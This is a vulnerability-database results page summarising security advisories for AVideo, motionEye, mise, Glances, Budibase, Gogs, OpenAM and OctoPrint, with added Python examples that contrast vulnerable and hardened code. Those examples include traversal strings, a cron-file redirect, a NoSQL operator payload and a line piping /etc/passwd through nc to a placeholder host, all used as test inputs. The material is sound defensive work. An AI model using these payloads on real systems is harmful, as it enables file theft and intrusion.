888642 matches found
GHSA-7CQP-7CFV-6C3Q AVideo Meet plugin: anonymous-to-admin stored XSS via unescaped participant User-Agent in getMeetInfo.json.php Participants panel
Summary The Meet plugin stores the raw HTTP User-Agent header of every meeting participant and later renders it without output encoding in the meeting-management "Participants" panel that the meeting host and site administrators open. An anonymous, unauthenticated attacker can join any public...
GHSA-PHV5-334H-MXCW motionEye Partial Authentication Bypass: Unauthenticated Admin Credential Theft via Path Traversal
Partial Authentication Bypass: Unauthenticated Admin Credential Theft via Path Traversal Summary Others and I have reported several RCE vulnerabilities to this project. However, due to the nature of the app, these are largely not of all that much value, as there is built-in functionality to...
GHSA-QXVG-H7Q2-HCXH motionEye: LFI → pass-the-hash admin → unsafe restore → unauth action exec (RCE)
Summary A multi-stage chain in motionEye leads to remote code execution. The chain combines: 1. Arbitrary file read (LFI) via the picture download endpoint for local motion cameras using absolute paths. 2. Pass-the-hash admin auth due to accepting request signatures computed with password hashes. 3...
GHSA-J67X-Q29F-QCVV motionEye's missing authentication on ActionHandler allows unauthenticated camera action execution
Summary The ActionHandler.post method in motionEye has no authentication decorator, allowing any unauthenticated attacker to trigger camera actions including snapshots, recording start/stop, and configured action scripts (PTZ controls, alarm triggers, etc.). Vulnerability Details File:...
GHSA-RW9Q-97R9-8GVH motionEye's Absolute Path Traversal in Media File Handlers Allows Arbitrary File Read
Summary motionEye contains an absolute path traversal vulnerability in multiple media file handlers that allows an attacker to read arbitrary files from the filesystem. The affected handlers accept a user-controlled filename parameter and construct filesystem paths using os.path.join. When an absolute...
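The os.path.join behaviour the advisory relies on, shown beside a hardened resolver. This is an added example, not motionEye's code; MEDIA_ROOT is a hypothetical per-camera media directory, and the handler names are invented for illustration.

```python
import os
import tempfile

# Hypothetical media root standing in for the per-camera directory a
# motionEye-style handler serves pictures from (assumption for this example).
MEDIA_ROOT = os.path.join(tempfile.gettempdir(), "media_root_example")


def vulnerable_media_path(filename: str) -> str:
    """The pattern the advisory describes. os.path.join discards every
    component to the left of an absolute argument, so a filename of
    '/etc/passwd' yields '/etc/passwd', not something under MEDIA_ROOT."""
    return os.path.join(MEDIA_ROOT, filename)


def safe_media_path(filename: str) -> str:
    """Hardened form (this example's code, not motionEye's). Resolve the
    candidate, including '..' and symlinks, then insist that the real path
    sits inside the real media root. commonpath() rather than startswith()
    so that '/srv/media_root2' is not mistaken for a child of '/srv/media_root'."""
    root = os.path.realpath(MEDIA_ROOT)
    candidate = os.path.realpath(os.path.join(root, filename))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"refusing path outside media root: {filename!r}")
    return candidate


def is_allowed(filename: str) -> bool:
    """True if the hardened resolver would serve this filename."""
    try:
        safe_media_path(filename)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate picture name, two traversal attempts.
    for name in ("cam1/2024-01-01/12-00-00.jpg", "../../etc/passwd", "/etc/passwd"):
        print(f"{name!r:36} join -> {vulnerable_media_path(name)!r:44} allowed={is_allowed(name)}")
```

Note that rejecting a leading "/" alone is not enough: "../" sequences and symlinks planted inside the media directory reach outside it just as well, which is why the check runs on the resolved path rather than on the input string.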
GHSA-29HF-RM4X-XXPH Mise's local credential_command executes untrusted config
Summary mise loads github.credential_command from local project config before any trust decision, then executes that value with sh -c when resolving a GitHub token. An attacker who can place a .mise.toml in a repository can execute arbitrary shell commands when the victim runs a GitHub-related mis...
GHSA-77G9-363W-RCCQ Mise vulnerable to arbitrary command execution via task-include files in an untrusted, config-less repository
Summary mise's trust feature gates config files (mise.toml, .tool-versions) through trustcheck, but task-include files are loaded on a path that never reaches it. When a directory has a task-include dir (mise-tasks/, .mise/tasks/, …) but no config file, mise falls back to the default includes and...
EEF-CVE-2026-55736 Private action arguments can be set by user input in Ash
Summary Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in ash-project ash allows a user to set the value of a private action argument that is intended to be controlled only by trusted server-side code. Action arguments declared with public?: false are...
GHSA-F94H-J2QG-FXW3 mise HTTP backend uses raw version path for install symlink destination
Summary The mise HTTP backend builds its install symlink destination from the raw resolved version string for non-latest versions. Normal tool install paths use the sanitized version pathname, but the HTTP backend's symlink path uses the raw value. On Unix-like systems, if that version is an...
GHSA-J4H9-PM27-4RFW OctoPrint has possible file exfiltration via query parameters on upload endpoints
Impact OctoPrint versions up until and including 1.11.7 as well as 2.0.0rc1 and 2.0.0rc2 contain a vulnerability that allows an attacker with the FILEUPLOAD permission to exfiltrate files from the host that OctoPrint has read access to, by moving them into the upload folder where they then can be...
RLSA-2026:28208 Important: postgresql:13 security update
PostgreSQL is an advanced object-relational database management system (DBMS). Security Fixes: postgresql: PostgreSQL: Credential recovery via covert timing channel in MD5 password comparison (CVE-2026-6478) For more details about the security issues, including the impact, a CVSS score,...
GHSA-3VWC-QWHC-3MJ7 Glances has arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration
Summary The secure_popen function in glances/secure.py interprets file redirection (>), pipe (|), and command chaining (&&) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP)...
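A sketch of why honouring shell operators in a configured command string is dangerous, beside the usual hardening: tokenise for quoting only, refuse operator tokens, and run without a shell. This is an added example and not Glances's secure_popen; the function names and the sample commands are constructed for illustration.

```python
import os
import shlex
import subprocess
import tempfile

# Characters that turn a "command" into a shell program. A command string
# containing any of these in any token is refused rather than interpreted.
SHELL_META = ("|", "&", ";", ">", "<", "`", "$(", "\n")


def naive_redirect_run(cmd: str) -> str:
    """Sketch of the hazard (this example's code, not Glances's): honouring '>'
    in a config-supplied command string lets the config author choose the
    output file, i.e. an arbitrary file write with the monitor's privileges."""
    left, sep, target = cmd.partition(">")
    out = subprocess.run(shlex.split(left), capture_output=True, text=True, check=False).stdout
    if sep:
        with open(target.strip(), "w", encoding="utf-8") as fh:  # path is attacker-chosen
            fh.write(out)
    return out


def demonstrate_arbitrary_write() -> str:
    """Run the naive runner with a redirect into a fresh temp dir and return what landed there."""
    target = os.path.join(tempfile.mkdtemp(), "dropped.txt")
    naive_redirect_run(f"echo owned > {target}")
    with open(target, encoding="utf-8") as fh:
        return fh.read()


def parse_command(cmd: str) -> list:
    """Hardened form: shlex.split() handles quoting but never interprets '>',
    '|' or '&&'; they simply become ordinary tokens, which is exactly what we
    look for. Anything that would need a shell to mean something is rejected."""
    argv = shlex.split(cmd)
    if not argv:
        raise ValueError("empty command")
    for tok in argv:
        if any(m in tok for m in SHELL_META):
            raise ValueError(f"shell operator in command: {tok!r}")
    return argv


def is_safe(cmd: str) -> bool:
    try:
        parse_command(cmd)
        return True
    except ValueError:
        return False


def safe_run(cmd: str) -> str:
    """Execute as an argv list with shell=False: nothing can redirect, pipe or
    chain, whatever characters survived in individual arguments."""
    return subprocess.run(parse_command(cmd), capture_output=True, text=True,
                          shell=False, check=False).stdout


if __name__ == "__main__":
    # Constructed sample AMP-style command strings.
    for c in ("uptime", "echo hi > /etc/cron.d/pwn", "true && id", "cat /etc/passwd | nc example.invalid 1"):
        print(f"{c!r:44} accepted={is_safe(c)}")
    print("naive runner wrote:", demonstrate_arbitrary_write().strip())
```

Rejecting on the token level (rather than scanning the raw string) also catches payloads such as "hi>file" where the operator is glued to an argument.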
ROOT-APP-NPM-CVE-2026-44576 CVE-2026-44576 in @rootio/next - Patched by Root
Root has patched CVE-2026-44576 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44572 CVE-2026-44572 in @rootio/next - Patched by Root
Root has patched CVE-2026-44572 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-45109 CVE-2026-45109 in @rootio/next - Patched by Root
Root has patched CVE-2026-45109 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44577 CVE-2026-44577 in @rootio/next - Patched by Root
Root has patched CVE-2026-44577 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44573 CVE-2026-44573 in @rootio/next - Patched by Root
Root has patched CVE-2026-44573 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-GHSA-8H8Q-6873-Q5FJ GHSA-8h8q-6873-q5fj in @rootio/next - Patched by Root
Root has patched GHSA-8h8q-6873-q5fj in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44575 CVE-2026-44575 in @rootio/next - Patched by Root
Root has patched CVE-2026-44575 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44574 CVE-2026-44574 in @rootio/next - Patched by Root
Root has patched CVE-2026-44574 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44581 CVE-2026-44581 in @rootio/next - Patched by Root
Root has patched CVE-2026-44581 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44580 CVE-2026-44580 in @rootio/next - Patched by Root
Root has patched CVE-2026-44580 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44579 CVE-2026-44579 in @rootio/next - Patched by Root
Root has patched CVE-2026-44579 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44578 CVE-2026-44578 in @rootio/next - Patched by Root
Root has patched CVE-2026-44578 in the @rootio/next package for Root:npm. Multiple fixed versions available...
ROOT-APP-NPM-CVE-2026-44582 CVE-2026-44582 in @rootio/next - Patched by Root
Root has patched CVE-2026-44582 in the @rootio/next package for Root:npm. Multiple fixed versions available...
GHSA-8QV3-P479-CJ62 Budibase has anonymous NoSQL operator injection via published-app query templates
Summary enrichContext (packages/server/src/sdk/workspace/queries/queries.ts:121-138) substitutes parameter values into the raw JSON body of a query, then passes the result to JSON.parse. The validator validateQueryInputs (packages/server/src/api/controllers/query/index.ts:61-71) rejects only Handlebars...
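Text substitution into a JSON body, followed by parsing, lets a parameter contribute structure rather than just a value. The following is an added example of that failure and of the fix (escape the value as a JSON string literal before substitution), not Budibase's enrichContext; the template, the {{email}} placeholder convention and the sample payload are constructed for illustration, and the hardened function assumes placeholders sit inside JSON string quotes.

```python
import json

# Hypothetical query template of the kind a published app might ship; the
# {{email}} placeholder is filled from a request parameter (assumption).
TEMPLATE = '{"email": "{{email}}", "role": "customer"}'


def enrich_by_text(template: str, params: dict) -> dict:
    """The pattern the advisory describes: splice the raw value into the JSON
    text, then parse. A value containing quotes and braces can therefore add
    fields and operators the template author never wrote."""
    text = template
    for name, value in params.items():
        text = text.replace("{{" + name + "}}", str(value))
    return json.loads(text)


def enrich_as_literal(template: str, params: dict) -> dict:
    """Hardened form (this example's code, not Budibase's): JSON-escape the value
    so that, inside the template's quotes, it can only ever be a string. The
    surrounding quotes come from the template, so strip the ones json.dumps adds."""
    text = template
    for name, value in params.items():
        text = text.replace("{{" + name + "}}", json.dumps(str(value))[1:-1])
    return json.loads(text)


def has_operator_keys(node) -> bool:
    """Defence in depth for the parsed query: any key starting with '$' is an
    operator the template did not contain and should not be sent to the store."""
    if isinstance(node, dict):
        return any(k.startswith("$") or has_operator_keys(v) for k, v in node.items())
    if isinstance(node, list):
        return any(has_operator_keys(v) for v in node)
    return False


# Constructed payload: closes the email string, injects a password clause that
# matches every document, and reopens a dummy string so the JSON stays valid.
PAYLOAD = 'x", "password": {"$ne": ""}, "k": "'


if __name__ == "__main__":
    print("text substitution :", enrich_by_text(TEMPLATE, {"email": PAYLOAD}))
    print("literal substitution:", enrich_as_literal(TEMPLATE, {"email": PAYLOAD}))
```

A validator that only looks for template syntax in the inputs, as the advisory describes, does nothing against this: the payload contains no Handlebars at all, just JSON punctuation.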
GHSA-WC3F-XC32-435F AVideo has an incomplete fix of CVE-2026-33482: sanitizeFFmpegCommand still allows a single '&' (background operator), giving OS command execution at the same execAsync sh -c sink
Summary The fix for CVE-2026-33482 (GHSA-pmj8-r2j7-xg6c) is incomplete. That advisory reported that sanitizeFFmpegCommand (plugin/API/standAlone/functions.php) failed to strip $... command substitution, allowing OS command injection at the execAsync sh -c sink. The fix commit 25c8ab90 added $, , , , ...
GHSA-3W28-36P9-W929 Gogs's Unauthenticated Jupyter Notebook (ipynb) Sanitizer allows arbitrary data: URIs leading to XSS
Summary The Jupyter Notebook (ipynb) sanitizer endpoint at POST /-/api/sanitizeipynb allows arbitrary data: URIs without proper restrictions, potentially leading to Cross-Site Scripting (XSS). The endpoint uses bluemonday.UGCPolicy with p.AllowURLSchemes("data"), which permits all data URI schemes...
GHSA-R9PV-5RPP-VM8G OpenAM Unauthenticated Session Hijacking via Information Exposure in CDCServlet
Summary Description An Information Exposure Through Sent Data (CWE-201) issue in OpenAM's Cross-Domain Single Sign-On (CDSSO) servlet allows a logged-in user's raw OpenAM session token to be POSTed to an attacker-controlled URL. This impacts OpenAM Community Edition through version 16.0.6. This issue...
GHSA-VVHJ-W2JQ-263Q OpenAM Authenticated Privilege Escalation via Raw Token Disclosure Session RPC
Summary Description An insufficient authorization (CWE-285) and information exposure (CWE-200) issue in OpenAM's session management endpoint allows a low-privileged authenticated user to retrieve active session credentials belonging to other users, including those with higher privileges. This affects...
ROOT-APP-MAVEN-CVE-2026-45292 CVE-2026-45292 in io.root.io.opentelemetry:opentelemetry-api - Patched by Root
Root has patched CVE-2026-45292 in the io.root.io.opentelemetry:opentelemetry-api package for Root:Maven. Multiple fixed versions available...
GHSA-P6QX-GHXM-389H OctoPrint has XSS in its Suppressed Command Notifications
Impact OctoPrint versions up to and including 1.11.7 as well as 2.0.0rc1 and 2.0.0rc2 are affected by a vulnerability that allows injection of arbitrary HTML and JavaScript into the Suppressed Command notification popups generated by the printer. An attacker who successfully convinces a victim to...
GHSA-744X-3838-5R56 Gogs Vulnerable to Unauthenticated Organization Teams Information Disclosure via API
Summary Gogs has an unauthenticated information disclosure vulnerability. The GET /api/v1/orgs/:orgname/teams endpoint at internal/route/api/v1/orgteam.go:8 returns all teams for any organization without requiring authentication. The route group at internal/route/api/v1/api.go:380-385 lacks the...
GHSA-XP79-5MX3-JX52 Gogs has Unauthenticated Asymmetric Denial of Service (DoS) via SSH Handshake Stall (File Descriptor Exhaustion)
The Gogs built-in Go SSH server is vulnerable to an unauthenticated, asymmetric Denial of Service (DoS) attack. The application accepts inbound TCP connections and passes them to golang.org/x/crypto/ssh.NewServerConn inside a new goroutine without enforcing any read/write deadlines on the underlyin...
GHSA-C39W-43GM-34H5 Gogs has Path Traversal in organization name that results in RCE through Git hooks
Summary Organization names containing path traversal sequences (../) are accepted by Gogs, and repositories under them are written to paths following these path traversals. This allows storing/retrieving data for repositories at arbitrary locations on the filesystem. By creating nested structure of...
GHSA-6P9M-Q3JP-47H4 Gogs: LFS dedupe path leaks private repo content across tenants
Summary Git LFS storage is content-addressed by OID alone, but per-repo authorization lives in the lfs_object table keyed (repo_id, oid). serveUpload skips re-uploading when the OID file already exists on disk and inserts a new (repo_id, oid) row pointing at it without verifying the request body hash...
GHSA-89MR-XQFV-758M Gogs: UploadRepoFiles writes outside repo working tree via committed parent sym
Summary Repository.UploadRepoFiles checks for symlinks only on the leaf of the upload target (osx.IsSymlink(targetPath)). The siblings UpdateRepoFile, DeleteRepoFile, and GetDiffPreview use hasSymlinkInPath, which lstats every component; UploadRepoFiles is the lone outlier. An attacker with repo-wri...
ROOT-APP-MAVEN-CVE-2026-34197 CVE-2026-34197 in io.root.org.apache.activemq:activemq-broker - Patched by Root
Root has patched CVE-2026-34197 in the io.root.org.apache.activemq:activemq-broker package for Root:Maven. Multiple fixed versions available...
ROOT-APP-MAVEN-CVE-2025-27533 CVE-2025-27533 in io.root.org.apache.activemq:activemq-openwire-legacy - Patched by Root
Root has patched CVE-2025-27533 in the io.root.org.apache.activemq:activemq-openwire-legacy package for Root:Maven. Multiple fixed versions available...
ROOT-APP-MAVEN-CVE-2025-66168 CVE-2025-66168 in io.root.org.apache.activemq:activemq-mqtt - Patched by Root
Root has patched CVE-2025-66168 in the io.root.org.apache.activemq:activemq-mqtt package for Root:Maven. Multiple fixed versions available...
ROOT-APP-MAVEN-CVE-2026-41043 CVE-2026-41043 in io.root.org.apache.activemq:activemq-broker - Patched by Root
Root has patched CVE-2026-41043 in the io.root.org.apache.activemq:activemq-broker package for Root:Maven. Multiple fixed versions available...
ROOT-APP-MAVEN-CVE-2026-39304 CVE-2026-39304 in io.root.org.apache.activemq:activemq-client - Patched by Root
Root has patched CVE-2026-39304 in the io.root.org.apache.activemq:activemq-client package for Root:Maven. Multiple fixed versions available...
ROOT-APP-MAVEN-CVE-2026-41044 CVE-2026-41044 in io.root.org.apache.activemq:activemq-broker - Patched by Root
Root has patched CVE-2026-41044 in the io.root.org.apache.activemq:activemq-broker package for Root:Maven. Multiple fixed versions available...
ROOT-APP-MAVEN-CVE-2026-40466 CVE-2026-40466 in io.root.org.apache.activemq:activemq-all - Patched by Root
Root has patched CVE-2026-40466 in the io.root.org.apache.activemq:activemq-all package for Root:Maven. Multiple fixed versions available...
ROOT-APP-MAVEN-CVE-2026-33227 CVE-2026-33227 in io.root.org.apache.activemq:activemq-client - Patched by Root
Root has patched CVE-2026-33227 in the io.root.org.apache.activemq:activemq-client package for Root:Maven. Multiple fixed versions available...
ROOT-APP-MAVEN-CVE-2026-40046 CVE-2026-40046 in io.root.org.apache.activemq:activemq-all - Patched by Root
Root has patched CVE-2026-40046 in the io.root.org.apache.activemq:activemq-all package for Root:Maven. Multiple fixed versions available...
GHSA-WMFG-5P4H-5FW3 Gogs allows users to write to readonly repositories using receive-pack + service=git-upload-pack confusion
Summary Git smart HTTP authorizes POST …/git-receive-pack using the client-supplied service query string so ?service=git-upload-pack is evaluated as read access while routing still runs git receive-pack, allowing push where only read should be allowed. Details Gogs' Git Smart HTTP handler for...
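The confusion in this advisory is that one request attribute (the path) decides what runs while a different, client-chosen attribute (the service query parameter) decides what is authorised. Below is an added example, not Gogs's handler, contrasting the two classification rules; the route and function names are constructed for illustration. Under the smart HTTP protocol only the GET info/refs advertisement legitimately selects the service via the query string; the POST endpoints name it in the path.

```python
from urllib.parse import parse_qs, urlsplit

READ, WRITE = "read", "write"


def service_from_query(method: str, url: str) -> str:
    """The pattern the advisory describes: the client-supplied ?service=
    parameter decides what the request is taken to be, on every endpoint."""
    return parse_qs(urlsplit(url).query).get("service", [""])[0]


def service_from_route(method: str, url: str) -> str:
    """Hardened form (this example's code, not Gogs's): the service is a
    property of the route being executed. The query string is consulted only
    where the protocol defines it, the GET info/refs advertisement, and a
    bare info/refs (dumb protocol) is a read."""
    parts = urlsplit(url)
    if method == "POST" and parts.path.endswith("/git-receive-pack"):
        return "git-receive-pack"
    if method == "POST" and parts.path.endswith("/git-upload-pack"):
        return "git-upload-pack"
    if method == "GET" and parts.path.endswith("/info/refs"):
        return parse_qs(parts.query).get("service", ["git-upload-pack"])[0]
    return ""  # unknown route: treated as needing write below (fail closed)


def required_access(service: str) -> str:
    """Only the fetch side is a read; receive-pack and anything unrecognised need write."""
    return READ if service == "git-upload-pack" else WRITE


def authorized(method: str, url: str, user_access: str, classify) -> bool:
    """classify is one of the two functions above. Returns whether a user
    holding user_access may proceed with this request."""
    needed = required_access(classify(method, url))
    return user_access == WRITE or needed == READ


if __name__ == "__main__":
    # Constructed push request carrying the bypass parameter from the advisory.
    push = "/alice/repo.git/git-receive-pack?service=git-upload-pack"
    print("read-only user, query-based check :", authorized("POST", push, READ, service_from_query))
    print("read-only user, route-based check :", authorized("POST", push, READ, service_from_route))
```

In a real handler the same rule should also bind the Content-Type (application/x-git-receive-pack-request for a push) to the route, so that no single client-controlled field can move a request between the read and write classes.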
GHSA-5C3F-6486-3G7G Gogs's password-reset tokens use account-activation lifetime, ignoring RESET_PASSWORD_CODE_LIVES
Summary Password-reset tokens are generated using conf.Auth.ActivateCodeLives (the account-activation lifetime), not conf.Auth.ResetPasswordCodeLives. The token lifetime is baked into the token itself at generation time and is re-extracted from the token at verification time, making...
GHSA-268J-37XF-PP52 Gogs's write-level collaborators can mutate admin-only repository settings via API
Summary Three API endpoints — PATCH /api/v1/repos/:owner/:repo/issue-tracker, PATCH /api/v1/repos/:owner/:repo/wiki, and POST /api/v1/repos/:owner/:repo/mirror-sync — are gated by reqRepoWriter rather than reqRepoAdmin. The equivalent operations in the web UI sit behind reqRepoAdmin, which requir...
GHSA-VCM5-GVMP-78MP Gogs has DOM-based XSS via Milestone Name on New Issue Page
Summary The fix for GHSA-vgjm-2cpf-4g7c DOM-based XSS via milestone selection was only applied to templates/repo/issue/viewcontent.tmpl but not to templates/repo/issue/newform.tmpl. An attacker can store an HTML/JavaScript payload in a milestone name, and when any user opens the New Issue page an...